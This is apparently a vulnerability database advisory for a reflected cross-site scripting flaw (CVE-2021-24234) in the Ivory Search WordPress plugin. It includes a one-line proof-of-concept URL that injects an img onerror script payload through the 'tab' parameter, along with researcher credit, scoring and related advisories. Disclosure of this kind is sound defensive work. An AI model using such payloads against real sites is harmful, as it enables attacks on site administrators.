Ivory Search < 4.6.1 – Reflected Cross Site Scripting (XSS) | CVE 2021-24234

Description

The Search Forms page of the plugin did not properly sanitise the tab parameter before output it in the page, leading to a reflected Cross-Site Scripting issue when opening a malicious crafted link as a high privilege user. Knowledge of a form id is required to conduct the attack.

Proof of Concept

https://example.com/wp-admin/admin.php?page=ivory-search&post=<form-id>&action=edit&tab=excludes%22%3E%3Cimg+src+onerror%3Dalert%28%2FXSS%2F%29%3E

Affects Plugins

add-search-to-menu

Fixed in 4.6.1

References

CVE

CVE-2021-24234

URL

https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-in-ivory-search-wp-plugin/

URL

https://www.jinsonvarghese.com/reflected-xss-vulnerability-found-in-ivory-search-plugin/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

5.8 (medium)

Miscellaneous

Original Researcher

Jinson Varghese Behanan

Submitter

Jinson Varghese Behanan

Submitter website

https://www.jinsonvarghese.com

Submitter twitter

JinsonCyberSec

Verified

Yes

WPVDB ID

ecc620be-8e29-4860-9d32-86b5814a3835

Timeline

Publicly Published

2021-03-30 (about 4 years ago)

Added

2021-03-30 (about 4 years ago)

Last Updated

2021-03-31 (about 4 years ago)

Other

Published

Title

Published

2023-05-11

Title

Owl Carousel <= 0.5.3 - Contributor+ Stored Cross-Site Scripting via shortcode

Published

2016-02-23

Title

CSV Import 1.0 - Reflected Cross-Site Scripting (XSS)

Published

2020-11-25

Title

WPJobBoard < 5.7.0 - Unauthenticated Reflected XSS & XFS

Published

2024-03-29

Title

Mighty Classic Pros And Cons <= 2.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-09-03

Title

Orbit Fox by ThemeIsle < 3.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting